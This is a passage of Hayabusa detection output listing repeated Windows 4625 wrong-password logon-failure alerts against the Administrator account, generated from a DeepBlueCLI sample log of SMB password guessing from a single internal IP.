+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: 
